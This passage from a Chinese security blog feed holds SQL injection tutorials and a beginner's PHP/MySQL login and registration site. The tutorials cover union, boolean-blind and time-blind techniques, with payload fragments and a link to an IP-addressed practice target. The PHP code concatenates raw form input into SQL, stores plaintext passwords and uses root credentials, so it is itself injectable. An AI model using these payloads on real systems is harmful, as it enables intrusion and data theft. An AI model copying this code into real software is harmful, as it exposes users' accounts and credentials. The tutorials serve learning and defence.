1=2#</code>报错,则存在注入点</p><p>2.确定列名数目</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">URL?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">' order by 列名数</span><br></code></pre></td></tr></table></figure><p>这里以<a href="http://103.85.87.93:10000/Production/PRODUCT_DETAIL.asp?id=1513">靶场</a>为例,当order by后面是22时正常,23时报错,说明这个数据库有22个列名。</p><p>3.猜表名</p><p>猜对了继续联合查询:<code>URL?id=1513' union select 1,2,......,22 from 表名</code>,猜不到算你倒霉(当然,可以结合网站源代码猜)。这样可以爆出显示位3和15,再把要查询的内容替换上面的3和15。</p><p>4.猜列名</p><p>(基本同上)</p><p>5.爆出数据</p><p>猜出列名就会返回数据。</p><h3 id="布尔盲注详细步骤"><a href="#布尔盲注详细步骤" class="headerlink" title="布尔盲注详细步骤"></a>布尔盲注详细步骤</h3><p>布尔盲注一般适用于页面没有回显字段 (不支持联合查询),且web页面返回true 或者 false,构造SQL语句,利用and,or等关键字来其后的语句 true 、 false 使web页面返回true或者false,从而达到注入的目的来获取信息。常用函数有<code>ascii(),mid(),substr(),group_concat(),length()</code>等。</p><p>1.判断注入点和数据库种类</p><p>(同联合查询)</p><p>2.猜表名</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> <span class="hljs-number">0</span> <span class="hljs-operator"><></span>(<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>)<span class="hljs-keyword">from</span> 表名)<br></code></pre></td></tr></table></figure><p>其中<>是不等于的意思,如果正常则存在该表。</p><p>3.猜记录数</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">from</span> 表名)<span class="hljs-operator">=</span>n<br></code></pre></td></tr></table></figure><p>如果正常,则记录数为n。</p><p>4.猜列名(字段名)</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">from</span> 表名 <span class="hljs-keyword">where</span> len(列名)<span class="hljs-operator">></span><span class="hljs-number">0</span>)<span class="hljs-operator">=</span><span class="hljs-number">1</span><br></code></pre></td></tr></table></figure><p>如果正常,则存在该列。</p><p>5.猜数据长度</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">from</span> 表名 <span class="hljs-keyword">where</span> len(列名)<span class="hljs-operator">></span>n)<span class="hljs-operator">=</span><span class="hljs-number">1</span><br></code></pre></td></tr></table></figure><p>如果正常,则该列长度为n。由于密码一般采用MD5加密,所以一般猜16位或32位。</p><p>6.爆出数据</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> top <span class="hljs-number">1</span> <span class="hljs-keyword">asc</span>(mid(admin,位数,<span class="hljs-number">1</span>)) <span class="hljs-keyword">from</span> admin) <span class="hljs-operator">=</span>ascii值<br></code></pre></td></tr></table></figure><p>如果正常,则通过表转换成相应字母。</p><h3 id="时间盲注详细步骤"><a href="#时间盲注详细步骤" class="headerlink" title="时间盲注详细步骤"></a>时间盲注详细步骤</h3><p>时间盲注与布尔盲注相似,就是把<code>and</code>后面换成<code>if(查询语句,sleep(5),0)</code>,这里不再赘述。其中如果满足if语句条件(即数据库查询语句),则睡眠5秒,否则页面无变化。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>联合查询法很快但是兼容性差,逐字猜解法很慢且繁琐但是兼容性好。由于Access数据库只能靠暴力猜解,因此经常会猜解不到列名,这样的话可以使用偏移注入,猜解不到表名的话可以使用社工方法。至于布尔盲注和时间盲注,我们一般采用burpsuite半自动的方式,有条件的可以配合代理池使用,以免因为请求数过多被封ip。</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>SQL注入</tag>
</tags>
</entry>
<entry>
<title>SQL注入(一)--原理介绍和基础</title>
<link href="/2021/07/28/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%80%EF%BC%89-%E5%8E%9F%E7%90%86%E4%BB%8B%E7%BB%8D%E5%92%8C%E5%9F%BA%E7%A1%80/"/>
<url>/2021/07/28/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%80%EF%BC%89-%E5%8E%9F%E7%90%86%E4%BB%8B%E7%BB%8D%E5%92%8C%E5%9F%BA%E7%A1%80/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近刚刚结束“前端三剑客”的学习,而web方向在开始学习SQL注入。我个人觉得新手入门SQL注入有些难,而且碰到CTF题目也不太敢下手,所以在这里简单说一下新手需要注意的点。</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="0x01-SQL注入原理介绍"><a href="#0x01-SQL注入原理介绍" class="headerlink" title="0x01 SQL注入原理介绍"></a>0x01 SQL注入原理介绍</h3><p>当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。</p><p>所以sql注入漏洞的本质是将用户输入的数据当做代码来执行。</p><p>sql注入的两个关键条件:用户可以控制输入的内容;web应用把用户输入的内容带进数据库执行。</p><h3 id="0x02-SQL注入基础"><a href="#0x02-SQL注入基础" class="headerlink" title="0x02 SQL注入基础"></a>0x02 SQL注入基础</h3><h4 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-built_in">system_user</span>(): 系统用户名<br><br><span class="hljs-keyword">user</span>(): 用户名<br><br><span class="hljs-built_in">current_user</span>(): 当前用户名<br><br><span class="hljs-built_in">session_user</span>(): 链接数据库的用户名<br><br>database(): 数据库名<br><br>version(): MySQL数据库版本<br><br>load_file(): 转成<span class="hljs-number">16</span>进制或者<span class="hljs-number">10</span>进制 MySQL读取本地文件的函数<br><br>@<span class="hljs-variable">@datadir</span>: 读取数据库路径<br><br>@<span class="hljs-variable">@basedir</span>: MySQL安装路径<br><br>@<span class="hljs-variable">@version</span>_compile_os: 操作系统<br><br>group_concat():将括号中的所有参数拼接成一个字符串<br><br>substr(str,<span class="hljs-keyword">start</span>,length):截取str字符串中从<span class="hljs-keyword">start</span>开始,长度为length的字符串<br></code></pre></td></tr></table></figure><h4 id="必记的一库三表"><a href="#必记的一库三表" class="headerlink" title="必记的一库三表"></a>必记的一库三表</h4><p>一库:information_schema(MySQL默认数据库)</p><p>三表:</p><p>0x01 SCHEMATA:存储了MySQL下每一个数据库的相关信息</p><ul><li>schema_name(字段):数据库名</li></ul><p>0x02 TABLES: 存储了MySQL下每一个表的相关信息</p><ul><li><p>TABLE_NAME(字段):数据表名</p></li><li><p>TABLE_SCHEMATA(字段):该数据表属于哪一个数据库</p></li></ul><p>0x03 COLUMNS:存储了MySQL下每一个数据表中的所有列名</p><ul><li>COLUMN_NAME(字段):字段名称</li><li>TABLE_NAME(字段):该字段属于哪一个数据表</li><li>TABLE_SCHEMA(字段):当前字段所属数据表所在的数据库名称</li></ul><p><strong>注意:这三张表在information_schema数据库下面,在SQL注入过程中不能直接指定表名,要使用“数据库名.数据表名”的形式,例如:information_schema.tables</strong>。</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>SQL注入</tag>
</tags>
</entry>
<entry>
<title>简单的登录页面</title>
<link href="/2021/07/19/%E7%AE%80%E5%8D%95%E7%9A%84%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2/"/>
<url>/2021/07/19/%E7%AE%80%E5%8D%95%E7%9A%84%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>在我的上一篇文章中,我讲到了本地建站前的准备工作,包括MySQL数据库的创建。现在,我将为大家讲解编写注册和登录页面的详细过程。请大家认真理解源代码中的注释!这里的MySQL数据库,只涉及到单表的CRUD操作,所以不是很难。</p><p>P.S.由于下学期太忙,一直没有更新,暑假才有时间总结。网页已经做出来几个月了,过程可能记得不是很清楚了,如有疑问敬请在评论区提出,我会尽量解答!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><p>CSS我不太会写,这里直接借鉴了某宝上的模板。因为注册和修改密码没有模板,所以只有最简单的HTML页面!</p><p>废话不多说,先上代码!</p><p>1.登录</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">//index.html<br><!DOCTYPE html><br><html><br><br><head><br><br><title>登录页面(样例)</title><br><br><meta name="keywords" content="登录界面素材" /><br><br><meta name="description" content="none" /><br><br><meta name="viewport" content="width=device-width, initial-scale=1"><br><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br><script<br>type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script><br><!-- Custom Theme files --><br><link href="css/style.css" rel="stylesheet" type="text/css" media="all" /><br><!-- //Custom Theme files --><br></head><br><br><body><br><!-- main --><br><div class="main-w3layouts wrapper"><br><h1>登录页面</h1><br><div class="main-agileinfo"><br><div class="agileits-top"><br><form action="登录.php" method="post"><br><input class="text" type="text" name="Username" placeholder="用户名" required=""><br><input class="text" type="password" name="Password" placeholder="密码" required=""><br><div class="wthree-text"><br><ul><br><li><br><label class="anim"><br><input type="checkbox" class="checkbox"><br><span> 记住我?(别点了,记不住的)</span><br></label><br></li><br><li><a href="修改密码.html">忘记密码?</a> </li><br></ul><br><div class="clear"> </div><br></div><br><input type="submit" value="登录" ><br></form><br><p>没有账号? <a href="注册.html" id="register"> 现在注册一个!</a></p><br><script><br> var register=document.getElementById('register');<br>register.addEventListener('click',function(){<br>location.href='注册.html';<br>})<br></script><br></div><br></div><br><!-- copyright --><br><div class="w3copyright-agile"><br><p>© 2021 <a href="http://terry906.top">Terry Zhang</a>. All rights reserved</p><br></div><br><!-- //copyright --><br><ul class="w3lsg-bubbles"><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br></ul><br></div><br><!-- //main --><br></body><br><br></html><br>//登录.php<br><?php<br> $username = $_POST['Username'];<br> $password = $_POST['Password'];<br> $conn=mysqli_connect("127.0.0.1","root","12345678");<br> if(!$conn){<br> die("数据库连接失败!");<br> }<br> mysqli_select_db($conn,"www_test_com");<br> mysqli_set_charset($conn,'utf-8');<br> //查询用户<br> $chks = "select username,password from obj_message where username='$username' and password='$password'";<br> $result = mysqli_query($conn,$chks);<br> if(mysqli_num_rows($result) > 0){<br> echo "<script>location.href='登录跳转.html'</script>";<br> }else{<br> echo "<script>alert('用户名或密码错误!');</script>";<br> echo "<script>location.href='index.html'</script>";<br> }<br><br>mysqli_close($conn);<br>//登录成功.html<br><!DOCTYPE html><br><html lang="zh-CN"><br><head><br> <meta charset="UTF-8"><br> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br> <title>登录页面(样例)</title><br></head><br><body><br> <div>恭喜您,登录成功!</div><br><br> <ul class="nav"><br> <li><br> <a href="#">我的</a><br> <ol><br> <li><a href="#">个人中心</a></li><br> <li><a href="#">积分</a></li><br> <li><a href="index.html">注销</a></li><br> </ol><br> </li><br> </ul><br> <script><br> var nav=document.querySelector('.nav');<br> var lis=nav.children;<br> for(var i=0;i<lis.length;i++){<br> lis[i].onmouseover=function (){<br> this.children[i].style.display='block';<br> }<br> lis[i].onmouseout=function (){<br> this.children[i].style.display='none';<br> }<br> }<br> </script><br></body><br></html><br>//登录跳转.html<br><!DOCTYPE html><br><html lang="zh-CN"><br><head><br> <meta charset="UTF-8"><br> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br> <title>登录跳转页(样例)</title><br> <style><br> .sp{font-size: 50px;}<br> </style><br></head><br><body><br> <span><img src="正确.png" width="60px"/></span><br> <span class="sp"></span><br> <script><br> var sp=document.querySelector('.sp');<br> var timer=5;<br> setInterval(function(){<br> if(timer==0){<br> location.href='登录成功.html';<br> }else{<br> sp.innerHTML='<strong>登录成功!您将在'+timer+'秒钟跳转!</strong>';<br> timer--;<br> }<br> },1000);<br> </script><br></body><br></html><br></code></pre></td></tr></table></figure><p>2.注册</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">//注册.html<br><!DOCTYPE html><br><html lang="zh-CN"><br><head><br> <meta charset="UTF-8"><br> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br> <title>注册页面(样例)</title><br></head><br><body><br> <h1 align="center">注册账号</h1><br> <form action="注册信息.php" method="post"><br> 用户名:<input type="text" value="请输入用户名" id="username" name="username" required/><br><br> 密码:<input type="text" value="请输入6-16位密码" id="pwd1" name="password" required/><br><br> 确认密码:<input type="text" value="请再次输入" id="pwd2" name="repassword" required/><br><br> <script><br> var pwd1=document.getElementById('pwd1');<br> var pwd2=document.getElementById('pwd2');<br> var username=document.getElementById('username');<br> var flag1=0;<br> var flag2=0;<br> username.onfocus=function(){<br> if(username.value==='请输入用户名'){<br> username.value='';<br> }<br> username.style.color='#333';//onfocus是得到焦点,#333是黑色<br> }<br> username.onblur=function(){<br> if(username.value===''){<br> username.value='请输入用户名';<br> }<br> username.style.color='#999';//onblur是失去焦点,#999是灰色<br> }<br> pwd1.onfocus=function(){<br> if(pwd1.value==='请输入6-16位密码'){<br> pwd1.value='';<br> pwd1.type='password';<br> }<br> pwd1.style.color='#333';<br> }<br> pwd2.onfocus=function(){<br> if(pwd2.value==='请再次输入'){<br> pwd2.value='';<br> pwd2.type='password';<br> }<br> pwd2.style.color='#333';<br> }<br> </script><br> <input type="submit" value="注册" id="zc"><br> <script><br> var zc=document.getElementById('zc');<br> zc.addEventListener('click',function(){<br> location.href="index.html";<br> })<br> </script><br> </form><br><br></body><br></html><br>//注册跳转.html<br><!DOCTYPE html><br><html lang="zh-CN"><br><head><br> <meta charset="UTF-8"><br> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br> <title>注册跳转页(样例)</title><br> <style><br> .sp{font-size: 50px;}<br> </style><br></head><br><body><br><span><img src="正确.png" width="60px"/></span><br><span class="sp"></span><br><script><br> var sp=document.querySelector('.sp');<br> var timer=5;<br> setInterval(function(){<br> if(timer==0){<br> location.href='index.html';<br> }else{<br> sp.innerHTML='<strong>注册成功!您将在'+timer+'秒钟跳转!</strong>';<br> timer--;<br> }<br> },1000);<br></script><br></body><br></html><br>//注册信息.php<br><?php<br> $username=$_POST['username'];<br> $password=$_POST['password'];<br> $repassword=$_POST['repassword'];<br> if($password!=$repassword)<br> {<br> echo "<script>alert('两次密码不一致!')</script>";<br> exit();<br> }<br> $arr=$_POST;<br> $conn=mysqli_connect("127.0.0.1","root","12345678");<br> if(!$conn){<br> die("数据库连接失败!");<br> }<br> mysqli_select_db($conn,"www_test_com");<br> mysqli_set_charset($conn,'utf-8');<br> $chk = "select username from user where username = '$username'";<br> $result = mysqli_query($conn,$chk);<br> if(mysqli_num_rows($result) > 0)<br> {<br> echo "<script>alert(\"该用户名已被注册\");</script>";<br> exit();<br> }<br> $sql="insert into obj_message set username='$_POST[username]',password='$_POST[password]',repassword='$_POST[repassword]'";<br> $check=mysqli_query($conn,$sql);<br> if($check)<br> {<br> echo "<script>location.href='注册跳转.html';</script>";<br> }<br> else<br> {<br> echo "<script>location.href='#';</script>";<br> }<br> mysqli_close($conn);<br></code></pre></td></tr></table></figure><p> 哦,差点忘了还有修改密码的页面:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">//修改密码.html<br><!DOCTYPE html><br><html lang="zh-CN"><br><head><br> <meta charset="UTF-8"><br> <title>修改密码(样例)</title><br></head><br><body><br><h1>修改密码</h1><br><br> <form action="修改密码.php" method="POST"><br> 用户名:<input type="text" name="usernames" required /><br><br> 修改密码:<input type="password" name="cgpwd" required /><br><br> 确认密码:<input type="password" name="recgpwd" required /><br><br> <input type="submit" value="修改" id="change" /><br> </form><br> <br></body><br></html><br>//修改密码.php<br><?php<br> $usernames=$_POST['usernames'];<br> $cgpwd=$_POST['cgpwd'];<br> $recgpwd=$_POST['recgpwd'];<br> if($cgpwd!=$recgpwd)<br> {<br> echo "<script>alert('两次输入的新密码不一致!');</script>";<br> exit();<br> }<br> $conn=mysqli_connect("127.0.0.1","root","12345678");<br> if(!$conn){<br> die("数据库连接失败!");<br> }<br> mysqli_select_db($conn,"www_test_com");<br> mysqli_set_charset($conn,'utf-8');<br>//查询用户<br> $chkss = "select username from obj_message where username='$usernames'";<br> $results = mysqli_query($conn,$chkss);<br> if(mysqli_num_rows($results) > 0){<br> ;<br> }else{<br> echo "<script>alert('该用户名不存在!');</script>";<br> echo "<script>location.href='index.html';</script>";<br> }<br> $sqls="update obj_message set password='$_POST[cgpwd]',repassword='$_POST[recgpwd]' where username='$_POST[usernames]'";<br> $qs=mysqli_query($conn,$sqls);<br> if($qs)<br> {<br> echo "<script>alert('修改成功!');</script>";<br> echo "<script>location.href='index.html';</script>";<br> }<br> else<br> {<br> echo "<script>alert('修改失败!');</script>";<br> echo "<script>location.href='#';</script>";<br> }<br> mysqli_close($conn);<br></code></pre></td></tr></table></figure><p>P.S.由于我是在PHPstudy上进行测试,所以IP地址一律填127.0.0.1,如果不是本机就填MySQL服务器IP!代码中的root和12345678分别为数据库账号和密码,因人而异!</p><h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>最后我发现,其实可以把连接数据库的PHP代码单独写成一个文件,然后在其它页面通过文件包含的相关函数(例如<code>include()</code>,<code>require()</code>)进行引用,这样可以减少代码量。首页的“记住密码”是假的,我想今后可以通过session会话的方式实现。</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>前端</tag>
</tags>
</entry>
<entry>
<title>PHPstudy本地建站</title>
<link href="/2021/04/04/PHPstudy%E6%9C%AC%E5%9C%B0%E5%BB%BA%E7%AB%99/"/>
<url>/2021/04/04/PHPstudy%E6%9C%AC%E5%9C%B0%E5%BB%BA%E7%AB%99/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p> 在经过了两周的学习以后,我终于结束了web前端(HTML5,JavaScript)部分内容以及后端(PHP,MySQL)部分内容的学习。通过这段时间的学习,我已经可以独立做出一个登录和注册的页面,并将其内容提交至MySQL数据库。下面,我将为大家详细介绍我搭建登录和注册页面的全过程。</p><h2 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>准备工作</h2><p> 对于小白来说,我不推荐租借或购买虚拟主机(VPS)进行搭建网站的相关练习,因为搭建环境比较复杂,新手不容易理解。我们可以在电脑上下载PHPstudy本地建站,一键部署WAMP(Windows+Apache+MySQL+PHP)环境,利用虚拟域名来模拟网站环境。</p><p> 首先,我们先前往PHPstudy官网下载小皮面板。下载完毕后,点击WAMP旁边的“启动”按钮,安装相关环境。安装完成后,点击左侧边栏的“网站”。</p><p><img src="https://s2.loli.net/2022/09/16/CaVSj7RLeuko4HE.png" alt="img"></p><p> 然后在“域名”里面填写www开头的网址,这里以<a href="http://www.test.com为例.填写网址之后勾选“创建数据库”,并设置账号密码./">www.test.com为例。填写网址之后勾选“创建数据库”,并设置账号密码。</a></p><p><img src="https://s2.loli.net/2022/09/16/BH6TULFwRIXtOl3.png" alt="img"></p><p><img src="https://s2.loli.net/2022/09/16/23SqfcMVgL9nIUx.png" alt="img"></p><p> 准备就绪后前往你电脑中的“phpstudy_pro”文件夹,找到“WWW”子文件夹下面以刚才自定义域名为名字的文件夹,并将已经创建好的网页文件夹复制进去。后面我会具体讲到登录和注册的制作过程。</p><p><img src="https://s2.loli.net/2022/09/16/cgIMYaHmfUZkPw7.png" alt="img"></p><p> 双击PHPstudy“网站”下面的“物理路径”,并选择复制进来的网页文件夹。注意网页文件中必须有一个文件是index.html,否则需要在“管理”的“修改”里面更改“网站首页”才可以看到你制作的网页。</p><p><img src="https://s2.loli.net/2022/09/16/gjsM2db9c84JNlF.png" alt="img"></p><p> 前往“软件管理”中下载并安装数据库管理工具sqlfront。新手推荐使用这个,因为它是图形化界面。当然,你也可以选择使用Navicat,只不过正版需要付费。</p><p><img src="https://s2.loli.net/2022/09/16/5nkIqYtPm1iTa3C.png" alt="img"></p><p> 进入之后,点击“新建”来创建一个登录信息。</p><p><img src="https://s2.loli.net/2022/09/16/Iigj29aocAqeX6G.png" alt="img"></p><p> “host”一栏填写默认本机IP–127.0.0.1,然后在下方选中你刚才创建的数据库。</p><p><img src="https://s2.loli.net/2022/09/16/lVwT1IrHzoDdfyA.png" alt="img"></p><p> 